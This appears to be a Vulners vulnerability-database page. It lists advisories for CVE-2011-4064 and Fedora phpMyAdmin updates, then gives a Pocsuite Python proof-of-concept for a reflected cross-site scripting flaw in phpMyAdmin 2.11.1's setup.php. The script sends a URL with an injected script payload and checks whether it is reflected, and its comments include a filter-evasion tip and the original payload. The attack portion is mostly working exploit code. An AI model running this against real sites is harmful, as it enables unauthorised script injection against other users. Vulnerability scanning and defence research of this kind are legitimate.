| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| CVE-2011-4064 | 1 Nov 201119:00 | – | cve | |
| CVE-2011-4064 | 1 Nov 201119:00 | – | cvelist | |
| CVE-2011-4064 | 1 Nov 201119:00 | – | debiancve | |
| EUVD-2011-4016 | 7 Oct 202500:30 | – | euvd | |
| [SECURITY] Fedora 14 Update: phpMyAdmin-3.4.7-1.fc14 | 13 Nov 201105:33 | – | fedora | |
| [SECURITY] Fedora 16 Update: phpMyAdmin-3.4.7-1.fc16 | 13 Nov 201105:34 | – | fedora | |
| [SECURITY] Fedora 15 Update: phpMyAdmin-3.4.7-1.fc15 | 13 Nov 201105:35 | – | fedora | |
| Fedora 16 : phpMyAdmin-3.4.7-1.fc16 (2011-15460) | 14 Nov 201100:00 | – | nessus | |
| Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469) | 14 Nov 201100:00 | – | nessus | |
| Fedora 14 : phpMyAdmin-3.4.7-1.fc14 (2011-15472) | 14 Nov 201100:00 | – | nessus |
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests
'''
原始利用链接:
http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script>
借鉴wvs使用prompt替代alert一定程度绕过限制,并使用特殊字段进行匹配:
<script>prompt("SEBUG@TEST");</script>
'''
class TestPOC(POCBase):
vulID = '23110' # ssvid
version = '1.0'
author = ['XXXXX']
vulDate = ''
createDate = '2016-01-01'
updateDate = '2016-01-01'
references = ['http://www.sebug.net/vuldb/ssvid-23110']
name = 'phpMyAdmin Setup接口跨站脚本漏洞'
appPowerLink = 'http://www.phpmyadmin.net/'
appName = 'phpMyAdmin'
appVersion = ''
vulType = 'XSS'
desc = '''
'''
samples = ['']
def _verify(self):
result = {}
vulurl = self.url + "/phpMyAdmin-2.11.1/scripts/setup.php?>'" + '"><script>prompt("SEBUG@TEST");</script>'
resp = requests.get(vulurl)
print resp.url
if '<script>prompt("SEBUG@TEST");</script>' in resp.content:
result['XSSInfo'] = {}
result['XSSInfo']['URL'] = resp.url
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation